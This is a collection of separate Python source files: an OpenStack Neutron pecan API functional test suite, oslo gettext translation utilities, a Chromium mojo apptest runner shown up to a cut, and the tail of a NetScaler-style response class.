        RESPTIME = "RESPTIME"
        BANDWIDTH = "BANDWIDTH"
        NONE = "NONE"
class streamidentifier_response(base_response) :
    """Response wrapper holding deserialized streamidentifier resources.

    :param length: number of empty streamidentifier placeholders to
        pre-allocate for the payload formatter to fill in.
    """
    def __init__(self, length=1) :
        self.errorcode = 0
        self.message = ""
        self.severity = ""
        self.sessionid = ""
        # The original code first assigned an empty list here and then
        # immediately overwrote it; the dead assignment has been removed.
        self.streamidentifier = [streamidentifier() for _ in range(length)]
| |
# Copyright (c) 2015 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils
from oslo_utils import uuidutils
from pecan import request
from pecan import set_config
from pecan.testing import load_test_app
import testtools
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.common import exceptions as n_exc
from neutron import context
from neutron import manager
from neutron.pecan_wsgi.controllers import root as controllers
from neutron.tests.unit import testlib_api
class PecanFunctionalTest(testlib_api.SqlTestCase):
    """Base class for pecan WSGI functional tests.

    Loads the test app from the adjacent config.py and pre-creates one
    network/port pair for the request tests to operate on.
    """

    def setUp(self):
        self.setup_coreplugin('neutron.plugins.ml2.plugin.Ml2Plugin')
        super(PecanFunctionalTest, self).setUp()
        self.addCleanup(extensions.PluginAwareExtensionManager.clear_instance)
        self.addCleanup(set_config, {}, overwrite=True)
        self.set_config_overrides()
        self.setup_app()

    def setup_app(self):
        config_path = os.path.join(os.path.dirname(__file__), 'config.py')
        self.app = load_test_app(config_path)
        self._gen_port()

    def _gen_port(self):
        plugin = manager.NeutronManager.get_plugin()
        net = plugin.create_network(context.get_admin_context(), {
            'network':
            {'name': 'pecannet', 'tenant_id': 'tenid', 'shared': False,
             'admin_state_up': True, 'status': 'ACTIVE'}})
        self.port = plugin.create_port(context.get_admin_context(), {
            'port':
            {'tenant_id': 'tenid', 'network_id': net['id'],
             'fixed_ips': attributes.ATTR_NOT_SPECIFIED,
             'mac_address': '00:11:22:33:44:55',
             'admin_state_up': True, 'device_id': 'FF',
             'device_owner': 'pecan', 'name': 'pecan'}})

    def set_config_overrides(self):
        # noauth keeps the tests independent of keystone.
        cfg.CONF.set_override('auth_strategy', 'noauth')
class TestV2Controller(PecanFunctionalTest):
    """Exercise basic CRUD verbs against the v2.0 API through pecan."""

    def test_get(self):
        resp = self.app.get('/v2.0/ports.json')
        self.assertEqual(resp.status_int, 200)

    def test_post(self):
        body = {'port': {'network_id': self.port['network_id'],
                         'admin_state_up': True,
                         'tenant_id': 'tenid'}}
        resp = self.app.post_json('/v2.0/ports.json', params=body,
                                  headers={'X-Tenant-Id': 'tenid'})
        self.assertEqual(resp.status_int, 201)

    def test_put(self):
        url = '/v2.0/ports/%s.json' % self.port['id']
        resp = self.app.put_json(url, params={'port': {'name': 'test'}},
                                 headers={'X-Tenant-Id': 'tenid'})
        self.assertEqual(resp.status_int, 200)

    def test_delete(self):
        url = '/v2.0/ports/%s.json' % self.port['id']
        resp = self.app.delete(url, headers={'X-Tenant-Id': 'tenid'})
        self.assertEqual(resp.status_int, 204)

    def test_plugin_initialized(self):
        self.assertIsNotNone(manager.NeutronManager._instance)

    def test_get_extensions(self):
        resp = self.app.get('/v2.0/extensions.json')
        self.assertEqual(resp.status_int, 200)

    def test_get_specific_extension(self):
        resp = self.app.get('/v2.0/extensions/allowed-address-pairs.json')
        self.assertEqual(resp.status_int, 200)
class TestErrors(PecanFunctionalTest):
    """Verify error codes for unknown paths and unsupported HTTP methods."""

    def test_404(self):
        resp = self.app.get('/assert_called_once', expect_errors=True)
        self.assertEqual(resp.status_int, 404)

    def test_bad_method(self):
        resp = self.app.patch('/v2.0/ports/44.json', expect_errors=True)
        self.assertEqual(resp.status_int, 405)
class TestRequestID(PecanFunctionalTest):
    """Every response must carry a req-<uuid> openstack request id."""

    def test_request_id(self):
        resp = self.app.get('/')
        self.assertIn('x-openstack-request-id', resp.headers)
        req_id = resp.headers['x-openstack-request-id']
        self.assertTrue(req_id.startswith('req-'))
        uuid_part = req_id.split('req-')[1]
        self.assertTrue(uuidutils.is_uuid_like(uuid_part))
class TestKeystoneAuth(PecanFunctionalTest):
    """With the default (keystone) auth strategy, requests are rejected."""

    def set_config_overrides(self):
        # Intentionally keep the default auth strategy (keystone).
        pass

    def test_auth_enforced(self):
        resp = self.app.get('/', expect_errors=True)
        self.assertEqual(resp.status_int, 401)
class TestInvalidAuth(PecanFunctionalTest):
    """Loading the app with a bogus auth strategy must fail fast."""

    def setup_app(self):
        # disable normal app setup since it will fail
        pass

    def test_invalid_auth_strategy(self):
        cfg.CONF.set_override('auth_strategy', 'badvalue')
        # The failure happens at app-load time, before any request is made.
        with testtools.ExpectedException(n_exc.InvalidConfigurationOption):
            load_test_app(os.path.join(os.path.dirname(__file__), 'config.py'))
class TestExceptionTranslationHook(PecanFunctionalTest):
    """Verify exception translation into HTTP error responses."""

    def test_neutron_nonfound_to_webob_exception(self):
        # this endpoint raises a Neutron notfound exception. make sure it gets
        # translated into a 404 error
        with mock.patch(
            'neutron.pecan_wsgi.controllers.root.CollectionsController.get',
            side_effect=n_exc.NotFound()
        ):
            response = self.app.get('/v2.0/ports.json', expect_errors=True)
            self.assertEqual(response.status_int, 404)

    def test_unexpected_exception(self):
        with mock.patch(
            'neutron.pecan_wsgi.controllers.root.CollectionsController.get',
            side_effect=ValueError('secretpassword')
        ):
            response = self.app.get('/v2.0/ports.json', expect_errors=True)
            # BUG FIX: assertNotIn(member, container). The original call was
            # assertNotIn(response.body, 'secretpassword') — arguments
            # reversed — which asked whether the whole body is a substring of
            # 'secretpassword' and therefore (almost) always passed, so the
            # exception-detail leak was never actually checked.
            self.assertNotIn('secretpassword', response.body)
            self.assertEqual(response.status_int, 500)
class TestRequestPopulatingHooks(PecanFunctionalTest):
    """Verify the hooks that stash the neutron context and resource type
    onto pecan's thread-local request object.
    """

    def setUp(self):
        super(TestRequestPopulatingHooks, self).setUp()

        # request.context is thread-local storage so it has to be accessed by
        # the controller. We can capture it into a list here to assert on after
        # the request finishes.
        def capture_request_details(*args, **kwargs):
            self.req_stash = {
                'context': request.context['neutron_context'],
                'resource_type': request.context['resource'],
            }
        # NOTE(review): the patch is started but never stopped; it appears to
        # rely on the test process tearing down — confirm whether a cleanup
        # (mock.patch.stopall) is registered elsewhere.
        mock.patch(
            'neutron.pecan_wsgi.controllers.root.CollectionsController.get',
            side_effect=capture_request_details
        ).start()

    # TODO(kevinbenton): add context tests for X-Roles etc

    def test_context_set_in_request(self):
        self.app.get('/v2.0/ports.json',
                     headers={'X-Tenant-Id': 'tenant_id'})
        self.assertEqual('tenant_id', self.req_stash['context'].tenant_id)

    def test_core_resource_identified(self):
        self.app.get('/v2.0/ports.json')
        self.assertEqual('port', self.req_stash['resource_type'])

    def test_service_plugin_identified(self):
        # TODO(kevinbenton): fix the unit test setup to include an l3 plugin
        self.skipTest("A dummy l3 plugin needs to be setup")
        self.app.get('/v2.0/routers.json')
        self.assertEqual('router', self.req_stash['resource_type'])
        # make sure the core plugin was identified as the handler for ports
        self.assertEqual(
            manager.NeutronManager.get_service_plugins()['L3_ROUTER_NAT'],
            self.req_stash['plugin'])
class TestEnforcementHooks(PecanFunctionalTest):
    """Placeholder tests for ownership, quota and policy enforcement hooks."""

    def test_network_ownership_check(self):
        # TODO(kevinbenton): get a scenario that passes attribute population
        self.skipTest("Attribute population blocks this test as-is")
        # Unreachable until the skip above is removed: posts a port on a
        # network owned by a different tenant.
        response = self.app.post_json('/v2.0/ports.json',
                                      params={'port': {'network_id': self.port['network_id'],
                                                       'admin_state_up': True,
                                                       'tenant_id': 'tenid2'}},
                                      headers={'X-Tenant-Id': 'tenid'})
        self.assertEqual(response.status_int, 200)

    def test_quota_enforcement(self):
        # TODO(kevinbenton): this test should do something
        pass

    def test_policy_enforcement(self):
        # TODO(kevinbenton): this test should do something
        pass
class TestRootController(PecanFunctionalTest):
    """Test version listing on root URI."""

    def test_get(self):
        resp = self.app.get('/')
        self.assertEqual(resp.status_int, 200)
        versions = jsonutils.loads(resp.body).get('versions')
        self.assertEqual(1, len(versions))
        # The single advertised version must echo V2Controller's metadata.
        for attr, value in controllers.V2Controller.version_info.items():
            self.assertIn(attr, versions[0])
            self.assertEqual(value, versions[0][attr])

    def _test_method_returns_405(self, method):
        resp = getattr(self.app, method)('/', expect_errors=True)
        self.assertEqual(resp.status_int, 405)

    def test_post(self):
        self._test_method_returns_405('post')

    def test_put(self):
        self._test_method_returns_405('put')

    def test_patch(self):
        self._test_method_returns_405('patch')

    def test_delete(self):
        self._test_method_returns_405('delete')

    def test_head(self):
        self._test_method_returns_405('head')
| |
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
gettext for openstack-common modules.
Usual usage in an openstack.common module:
from oslo.utils.openstack.common.gettextutils import _
"""
import copy
import functools
import gettext
import locale
from logging import handlers
import os
from babel import localedata
import six
_AVAILABLE_LANGUAGES = {}
# FIXME(dhellmann): Remove this when moving to oslo.i18n.
USE_LAZY = False
class TranslatorFactory(object):
    """Create translator functions
    """

    def __init__(self, domain, lazy=False, localedir=None):
        """Establish a set of translation functions for the domain.
        :param domain: Name of translation domain,
                       specifying a message catalog.
        :type domain: str
        :param lazy: Delays translation until a message is emitted.
                     Defaults to False.
        :type lazy: Boolean
        :param localedir: Directory with translation catalogs.
        :type localedir: str
        """
        self.domain = domain
        self.lazy = lazy
        if localedir is None:
            # Fall back to a per-domain env var, e.g. NOVA_LOCALEDIR.
            localedir = os.environ.get(domain.upper() + '_LOCALEDIR')
        self.localedir = localedir

    def _make_translation_func(self, domain=None):
        """Return a new translation function ready for use.
        Takes into account whether or not lazy translation is being
        done.
        The domain can be specified to override the default from the
        factory, but the localedir from the factory is always used
        because we assume the log-level translation catalogs are
        installed in the same directory as the main application
        catalog.
        """
        if domain is None:
            domain = self.domain
        if self.lazy:
            # Lazy mode returns a Message constructor so the actual
            # translation can be deferred until the message is emitted.
            return functools.partial(Message, domain=domain)
        t = gettext.translation(
            domain,
            localedir=self.localedir,
            fallback=True,
        )
        if six.PY3:
            return t.gettext
        return t.ugettext

    @property
    def primary(self):
        "The default translation function."
        return self._make_translation_func()

    def _make_log_translation_func(self, level):
        # Log-level catalogs follow the "<domain>-log-<level>" naming scheme.
        return self._make_translation_func(self.domain + '-log-' + level)

    @property
    def log_info(self):
        "Translate info-level log messages."
        return self._make_log_translation_func('info')

    @property
    def log_warning(self):
        "Translate warning-level log messages."
        return self._make_log_translation_func('warning')

    @property
    def log_error(self):
        "Translate error-level log messages."
        return self._make_log_translation_func('error')

    @property
    def log_critical(self):
        "Translate critical-level log messages."
        return self._make_log_translation_func('critical')
# NOTE(dhellmann): When this module moves out of the incubator into
# oslo.i18n, these global variables can be moved to an integration
# module within each application.
# Create the global translation functions.
_translators = TranslatorFactory('oslo.utils')
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
# NOTE(dhellmann): End of globals that will move to the application's
# integration module.
def enable_lazy():
    """Convenience function for configuring _() to use lazy gettext
    Call this at the start of execution to enable the gettextutils._
    function to use lazy gettext functionality. This is useful if
    your project is importing _ directly instead of using the
    gettextutils.install() way of importing the _ function.
    """
    # FIXME(dhellmann): This function will be removed in oslo.i18n,
    # because the TranslatorFactory makes it superfluous.
    global _, _LI, _LW, _LE, _LC, USE_LAZY
    # Rebind all of the module-level translation functions to lazy
    # (Message-producing) versions from a fresh factory.
    tf = TranslatorFactory('oslo.utils', lazy=True)
    _ = tf.primary
    _LI = tf.log_info
    _LW = tf.log_warning
    _LE = tf.log_error
    _LC = tf.log_critical
    USE_LAZY = True
def install(domain, lazy=False):
    """Install a _() function using the given translation domain.
    Given a translation domain, install a _() function using gettext's
    install() function.
    The main difference from gettext.install() is that we allow
    overriding the default localedir (e.g. /usr/share/locale) using
    a translation-domain-specific environment variable (e.g.
    NOVA_LOCALEDIR).
    :param domain: the translation domain
    :param lazy: indicates whether or not to install the lazy _() function.
                 The lazy _() introduces a way to do deferred translation
                 of messages by installing a _ that builds Message objects,
                 instead of strings, which can then be lazily translated into
                 any available locale.
    """
    if lazy:
        # Install a Message-building _ into builtins so it is visible
        # everywhere without an explicit import.
        from six import moves
        tf = TranslatorFactory(domain, lazy=True)
        moves.builtins.__dict__['_'] = tf.primary
    else:
        localedir = '%s_LOCALEDIR' % domain.upper()
        if six.PY3:
            gettext.install(domain,
                            localedir=os.environ.get(localedir))
        else:
            # Python 2 needs unicode=True so _() returns unicode objects.
            gettext.install(domain,
                            localedir=os.environ.get(localedir),
                            unicode=True)
class Message(six.text_type):
    """A Message object is a unicode object that can be translated.
    Translation of Message is done explicitly using the translate() method.
    For all non-translation intents and purposes, a Message is simply unicode,
    and can be treated as such.
    """

    def __new__(cls, msgid, msgtext=None, params=None,
                domain='oslo.utils', *args):
        """Create a new Message object.
        In order for translation to work gettext requires a message ID, this
        msgid will be used as the base unicode text. It is also possible
        for the msgid and the base unicode text to be different by passing
        the msgtext parameter.
        """
        # If the base msgtext is not given, we use the default translation
        # of the msgid (which is in English) just in case the system locale is
        # not English, so that the base text will be in that locale by default.
        if not msgtext:
            msgtext = Message._translate_msgid(msgid, domain)
        # We want to initialize the parent unicode with the actual object that
        # would have been plain unicode if 'Message' was not enabled.
        msg = super(Message, cls).__new__(cls, msgtext)
        # Keep the original msgid/domain/params so the message can be
        # re-translated to any locale later.
        msg.msgid = msgid
        msg.domain = domain
        msg.params = params
        return msg

    def translate(self, desired_locale=None):
        """Translate this message to the desired locale.
        :param desired_locale: The desired locale to translate the message to,
                               if no locale is provided the message will be
                               translated to the system's default locale.
        :returns: the translated message in unicode
        """
        translated_message = Message._translate_msgid(self.msgid,
                                                      self.domain,
                                                      desired_locale)
        if self.params is None:
            # No need for more translation
            return translated_message
        # This Message object may have been formatted with one or more
        # Message objects as substitution arguments, given either as a single
        # argument, part of a tuple, or as one or more values in a dictionary.
        # When translating this Message we need to translate those Messages too
        translated_params = _translate_args(self.params, desired_locale)
        translated_message = translated_message % translated_params
        return translated_message

    @staticmethod
    def _translate_msgid(msgid, domain, desired_locale=None):
        # Translate a single msgid via the gettext catalog for the domain,
        # falling back to the system locale (or en_US) when none is given.
        if not desired_locale:
            system_locale = locale.getdefaultlocale()
            # If the system locale is not available to the runtime use English
            if not system_locale[0]:
                desired_locale = 'en_US'
            else:
                desired_locale = system_locale[0]
        locale_dir = os.environ.get(domain.upper() + '_LOCALEDIR')
        lang = gettext.translation(domain,
                                   localedir=locale_dir,
                                   languages=[desired_locale],
                                   fallback=True)
        if six.PY3:
            translator = lang.gettext
        else:
            translator = lang.ugettext
        translated_message = translator(msgid)
        return translated_message

    def __mod__(self, other):
        # When we mod a Message we want the actual operation to be performed
        # by the parent class (i.e. unicode()), the only thing we do here is
        # save the original msgid and the parameters in case of a translation
        params = self._sanitize_mod_params(other)
        unicode_mod = super(Message, self).__mod__(params)
        modded = Message(self.msgid,
                         msgtext=unicode_mod,
                         params=params,
                         domain=self.domain)
        return modded

    def _sanitize_mod_params(self, other):
        """Sanitize the object being modded with this Message.
        - Add support for modding 'None' so translation supports it
        - Trim the modded object, which can be a large dictionary, to only
          those keys that would actually be used in a translation
        - Snapshot the object being modded, in case the message is
          translated, it will be used as it was when the Message was created
        """
        if other is None:
            # "%s" % None requires a one-element tuple to format correctly.
            params = (other,)
        elif isinstance(other, dict):
            # Merge the dictionaries
            # Copy each item in case one does not support deep copy.
            params = {}
            if isinstance(self.params, dict):
                for key, val in self.params.items():
                    params[key] = self._copy_param(val)
            for key, val in other.items():
                params[key] = self._copy_param(val)
        else:
            params = self._copy_param(other)
        return params

    def _copy_param(self, param):
        try:
            return copy.deepcopy(param)
        except Exception:
            # Fallback to casting to unicode this will handle the
            # python code-like objects that can't be deep-copied
            return six.text_type(param)

    def __add__(self, other):
        # Concatenation would lose the msgid needed for later translation.
        msg = _('Message objects do not support addition.')
        raise TypeError(msg)

    def __radd__(self, other):
        return self.__add__(other)

    if six.PY2:
        def __str__(self):
            # NOTE(luisg): Logging in python 2.6 tries to str() log records,
            # and it expects specifically a UnicodeError in order to proceed.
            msg = _('Message objects do not support str() because they may '
                    'contain non-ascii characters. '
                    'Please use unicode() or translate() instead.')
            raise UnicodeError(msg)
def get_available_languages(domain):
    """Lists the available languages for the given translation domain.
    :param domain: the domain to get languages for
    """
    # Results are memoized per domain in the module-level cache; a copy is
    # returned so callers can't mutate the cached list.
    if domain in _AVAILABLE_LANGUAGES:
        return copy.copy(_AVAILABLE_LANGUAGES[domain])
    localedir = '%s_LOCALEDIR' % domain.upper()
    find = lambda x: gettext.find(domain,
                                  localedir=os.environ.get(localedir),
                                  languages=[x])
    # NOTE(mrodden): en_US should always be available (and first in case
    # order matters) since our in-line message strings are en_US
    language_list = ['en_US']
    # NOTE(luisg): Babel <1.0 used a function called list(), which was
    # renamed to locale_identifiers() in >=1.0, the requirements master list
    # requires >=0.9.6, uncapped, so defensively work with both. We can remove
    # this check when the master list updates to >=1.0, and update all projects
    list_identifiers = (getattr(localedata, 'list', None) or
                        getattr(localedata, 'locale_identifiers'))
    locale_identifiers = list_identifiers()
    # Keep only the locales for which a catalog for this domain exists.
    for i in locale_identifiers:
        if find(i) is not None:
            language_list.append(i)
    # NOTE(luisg): Babel>=1.0,<1.3 has a bug where some OpenStack supported
    # locales (e.g. 'zh_CN', and 'zh_TW') aren't supported even though they
    # are perfectly legitimate locales:
    #     https://github.com/mitsuhiko/babel/issues/37
    # In Babel 1.3 they fixed the bug and they support these locales, but
    # they are still not explicitly "listed" by locale_identifiers().
    # That is why we add the locales here explicitly if necessary so that
    # they are listed as supported.
    aliases = {'zh': 'zh_CN',
               'zh_Hant_HK': 'zh_HK',
               'zh_Hant': 'zh_TW',
               'fil': 'tl_PH'}
    for (locale, alias) in six.iteritems(aliases):
        if locale in language_list and alias not in language_list:
            language_list.append(alias)
    _AVAILABLE_LANGUAGES[domain] = language_list
    return copy.copy(language_list)
def translate(obj, desired_locale=None):
    """Gets the translated unicode representation of the given object.
    If the object is not translatable it is returned as-is.
    If the locale is None the object is translated to the system locale.
    :param obj: the object to translate
    :param desired_locale: the locale to translate the message to, if None the
                           default system locale will be used
    :returns: the translated object in unicode, or the original object if
              it could not be translated
    """
    # Coerce non-Message objects to their unicode representation first;
    # a Message is left as-is so its translation metadata is preserved.
    candidate = obj if isinstance(obj, Message) else six.text_type(obj)
    # Even after unicoding() we still need to check if we are
    # running with translatable unicode before translating.
    if isinstance(candidate, Message):
        return candidate.translate(desired_locale)
    return obj
def _translate_args(args, desired_locale=None):
    """Translates all the translatable elements of the given arguments object.
    This method is used for translating the translatable values in method
    arguments which include values of tuples or dictionaries.
    If the object is not a tuple or a dictionary the object itself is
    translated if it is translatable.
    If the locale is None the object is translated to the system locale.
    :param args: the args to translate
    :param desired_locale: the locale to translate the args to, if None the
                           default system locale will be used
    :returns: a new args object with the translated contents of the original
    """
    if isinstance(args, tuple):
        return tuple(translate(v, desired_locale) for v in args)
    if isinstance(args, dict):
        # Build a fresh dict; values are translated, keys are untouched.
        return dict((k, translate(v, desired_locale))
                    for (k, v) in six.iteritems(args))
    return translate(args, desired_locale)
class TranslationHandler(handlers.MemoryHandler):
    """Handler that translates records before logging them.
    The TranslationHandler takes a locale and a target logging.Handler object
    to forward LogRecord objects to after translating them. This handler
    depends on Message objects being logged, instead of regular strings.
    The handler can be configured declaratively in the logging.conf as follows:
        [handlers]
        keys = translatedlog, translator
        [handler_translatedlog]
        class = handlers.WatchedFileHandler
        args = ('/var/log/api-localized.log',)
        formatter = context
        [handler_translator]
        class = openstack.common.log.TranslationHandler
        target = translatedlog
        args = ('zh_CN',)
    If the specified locale is not available in the system, the handler will
    log in the default locale.
    """

    def __init__(self, locale=None, target=None):
        """Initialize a TranslationHandler
        :param locale: locale to use for translating messages
        :param target: logging.Handler object to forward
                       LogRecord objects to after translation
        """
        # NOTE(luisg): In order to allow this handler to be a wrapper for
        # other handlers, such as a FileHandler, and still be able to
        # configure it using logging.conf, this handler has to extend
        # MemoryHandler because only the MemoryHandlers' logging.conf
        # parsing is implemented such that it accepts a target handler.
        handlers.MemoryHandler.__init__(self, capacity=0, target=target)
        self.locale = locale

    def setFormatter(self, fmt):
        # Formatting is delegated entirely to the wrapped target handler.
        self.target.setFormatter(fmt)

    def emit(self, record):
        # We save the message from the original record to restore it
        # after translation, so other handlers are not affected by this
        original_msg = record.msg
        original_args = record.args
        try:
            self._translate_and_log_record(record)
        finally:
            # Always restore, even if translation or emission raised.
            record.msg = original_msg
            record.args = original_args

    def _translate_and_log_record(self, record):
        record.msg = translate(record.msg, self.locale)
        # In addition to translating the message, we also need to translate
        # arguments that were passed to the log method that were not part
        # of the main message e.g., log.info(_('Some message %s'), this_one))
        record.args = _translate_args(record.args, self.locale)
        self.target.emit(record)
| |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import Queue
import re
import subprocess
import sys
import threading
import time
from mopy.config import Config
from mopy.paths import Paths
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)),
'..', '..', '..', 'testing'))
import xvfb
# The DISPLAY ID number used for xvfb, incremented with each use.
XVFB_DISPLAY_ID = 9
def set_color():
    '''Run gtests with color on TTY, unless its environment variable is set.'''
    # Only force color when writing to a real terminal and the caller has
    # not already expressed a preference via GTEST_COLOR.
    wants_color = sys.stdout.isatty() and 'GTEST_COLOR' not in os.environ
    if wants_color:
        logging.getLogger().debug('Setting GTEST_COLOR=yes')
        os.environ['GTEST_COLOR'] = 'yes'
def run_apptest(config, shell, args, apptest, isolate):
    '''Run the apptest; optionally isolating fixtures across shell invocations.
    Returns the list of test fixtures run and the list of failed test fixtures.
    TODO(msw): Also return the list of DISABLED test fixtures.
    Args:
      config: The mopy.config.Config for the build.
      shell: The mopy.android.AndroidShell, if Android is the target platform.
      args: The arguments for the shell or apptest.
      apptest: The application test URL.
      isolate: True if the test fixtures should be run in isolation.
    '''
    if not isolate:
        # Non-isolated mode: one shell invocation runs every fixture.
        return _run_apptest_with_retry(config, shell, args, apptest)
    fixtures = _get_fixtures(config, shell, args, apptest)
    # Skip DISABLED_ fixtures entirely in isolated runs.
    fixtures = [f for f in fixtures if not f.startswith('DISABLED_')]
    failed = []
    for fixture in fixtures:
        # One shell invocation per fixture, selected via --gtest_filter.
        arguments = args + ['--gtest_filter=%s' % fixture]
        failures = _run_apptest_with_retry(config, shell, arguments, apptest)[1]
        # A whole-apptest failure (e.g. crash) is recorded as this fixture.
        failed.extend(failures if failures != [apptest] else [fixture])
        # Abort when 20 fixtures, or a tenth of the apptest fixtures, have failed.
        # base::TestLauncher does this for timeouts and unknown results.
        if len(failed) >= max(20, len(fixtures) / 10):
            print 'Too many failing fixtures (%d), exiting now.' % len(failed)
            return (fixtures, failed + [apptest + ' aborted for excessive failures.'])
    return (fixtures, failed)
# TODO(msw): Determine proper test retry counts; allow configuration.
def _run_apptest_with_retry(config, shell, args, apptest, retry_count=2):
    '''Runs an apptest, retrying on failure; returns the fixtures and failures.'''
    (tests, failed) = _run_apptest(config, shell, args, apptest)
    while failed and retry_count:
        print 'Retrying failed tests (%d attempts remaining)' % retry_count
        arguments = args
        # Retry only the failing fixtures if there is no existing filter specified.
        if failed != [apptest] and not [a for a in args if '--gtest_filter=' in a]:
            arguments += ['--gtest_filter=%s' % ':'.join(failed)]
        # Keep the original fixture list; only the failure set is refreshed.
        failed = _run_apptest(config, shell, arguments, apptest)[1]
        retry_count -= 1
    return (tests, failed)
def _run_apptest(config, shell, args, apptest):
    '''Runs an apptest; returns the list of fixtures and the list of failures.'''
    command = _build_command_line(config, args, apptest)
    logging.getLogger().debug('Command: %s' % ' '.join(command))
    start_time = time.time()
    try:
        output = _run_test_with_xvfb(config, shell, args, apptest)
    except Exception as e:
        _print_exception(command, e)
        # Failure to run at all counts as the whole apptest failing.
        return ([apptest], [apptest])
    # Find all fixtures begun from gtest's '[ RUN ] <Suite.Fixture>' output.
    tests = [x for x in output.split('\n') if x.find('[ RUN ] ') != -1]
    tests = [x.strip(' \t\n\r')[x.find('[ RUN ] ') + 13:] for x in tests]
    # Fail on output with gtest's '[ FAILED ]' or a lack of '[ OK ]'.
    # The latter check ensures failure on broken command lines, hung output, etc.
    # Check output instead of exit codes because mojo shell always exits with 0.
    failed = [x for x in tests if (re.search('\[ FAILED \].*' + x, output) or
                                   not re.search('\[ OK \].*' + x, output))]
    ms = int(round(1000 * (time.time() - start_time)))
    if failed:
        _print_exception(command, output, ms)
    else:
        logging.getLogger().debug('Passed in %d ms with output:\n%s' % (ms, output))
    return (tests, failed)
def _get_fixtures(config, shell, args, apptest):
    '''Returns an apptest's 'Suite.Fixture' list via --gtest_list_tests output.'''
    arguments = args + ['--gtest_list_tests']
    command = _build_command_line(config, arguments, apptest)
    logging.getLogger().debug('Command: %s' % ' '.join(command))
    try:
        tests = _run_test_with_xvfb(config, shell, arguments, apptest)
        logging.getLogger().debug('Tests for %s:\n%s' % (apptest, tests))
        # Remove log lines from the output and ensure it matches known formatting.
        tests = re.sub('^(\[|WARNING: linker:).*\n', '', tests, flags=re.MULTILINE)
        if not re.match('^(\w*\.\r?\n( \w*\r?\n)+)+', tests):
            raise Exception('Unrecognized --gtest_list_tests output:\n%s' % tests)
        test_list = []
        # gtest lists a suite name at column 0, then its fixtures indented;
        # join each indented fixture with the suite seen most recently.
        for line in tests.split('\n'):
            if not line:
                continue
            if line[0] != ' ':
                suite = line.strip()
                continue
            test_list.append(suite + line.strip())
        return test_list
    except Exception as e:
        _print_exception(command, e)
    return []
def _print_exception(command_line, exception, milliseconds=None):
    '''Print a formatted exception raised from a failed command execution.'''
    details = (' (in %d ms)' % milliseconds) if milliseconds else ''
    # subprocess.CalledProcessError carries a returncode; include it if present.
    if hasattr(exception, 'returncode'):
        details += ' (with exit code %d)' % exception.returncode
    print '\n[ FAILED ] Command%s: %s' % (details, ' '.join(command_line))
    print 72 * '-'
    # |exception| may be an exception object or the raw output string.
    if hasattr(exception, 'output'):
        print exception.output
    print str(exception)
    print 72 * '-'
def _build_command_line(config, args, apptest):
    '''Build the apptest command line. This value isn't executed on Android.'''
    # Idiom fix: use "x not in y" rather than "not x in y".
    not_list_tests = '--gtest_list_tests' not in args
    # Use a throwaway user data dir for real runs, but not when only
    # listing tests.
    data_dir = ['--use-temporary-user-data-dir'] if not_list_tests else []
    return Paths(config).mojo_runner + data_dir + args + [apptest]
def _run_test_with_xvfb(config, shell, args, apptest):
    '''Run the test with xvfb; return the output or raise an exception.'''
    env = os.environ.copy()
    # Xvfb is only needed for real test runs on Linux desktop builds.
    if (config.target_os != Config.OS_LINUX or '--gtest_list_tests' in args
        or not xvfb.should_start_xvfb(env)):
        return _run_test_with_timeout(config, shell, args, apptest, env)
    try:
        # Simply prepending xvfb.py to the command line precludes direct control of
        # test subprocesses, and prevents easily getting output when tests timeout.
        xvfb_proc = None
        openbox_proc = None
        global XVFB_DISPLAY_ID
        display_string = ':' + str(XVFB_DISPLAY_ID)
        (xvfb_proc, openbox_proc) = xvfb.start_xvfb(env, Paths(config).build_dir,
                                                    display=display_string)
        # Rotate the display id so concurrent/subsequent runs don't collide.
        XVFB_DISPLAY_ID = (XVFB_DISPLAY_ID + 1) % 50000
        if not xvfb_proc or not xvfb_proc.pid:
            raise Exception('Xvfb failed to start; aborting test run.')
        if not openbox_proc or not openbox_proc.pid:
            raise Exception('Openbox failed to start; aborting test run.')
        logging.getLogger().debug('Running Xvfb %s (pid %d) and Openbox (pid %d).' %
                                  (display_string, xvfb_proc.pid, openbox_proc.pid))
        return _run_test_with_timeout(config, shell, args, apptest, env)
    finally:
        # Both processes are killed even if the test raised; kill(None) is
        # reached only when start_xvfb itself failed.
        xvfb.kill(xvfb_proc)
        xvfb.kill(openbox_proc)
# TODO(msw): Determine proper test timeout durations (starting small).
def _run_test_with_timeout(config, shell, args, apptest, env, seconds=10):
    '''Run the test with a timeout; return the output or raise an exception.'''
    result = Queue.Queue()
    thread = threading.Thread(target=_run_test,
                              args=(config, shell, args, apptest, env, result))
    thread.start()
    # _run_test first puts the process (or shell) on the queue so we can
    # kill it from here on timeout.
    process_or_shell = result.get()
    thread.join(seconds)
    timeout_exception = ''
    if thread.is_alive():
        timeout_exception = '\nError: Test timeout after %s seconds' % seconds
        logging.getLogger().debug('Killing the runner or shell for timeout.')
        try:
            process_or_shell.kill()
        except OSError:
            pass # The process may have ended after checking |is_alive|.
        # Give the worker thread a second chance to exit after the kill.
        thread.join(seconds)
        if thread.is_alive():
            raise Exception('Error: Test hung and could not be killed!')
    if result.empty():
        raise Exception('Error: Test exited with no output.')
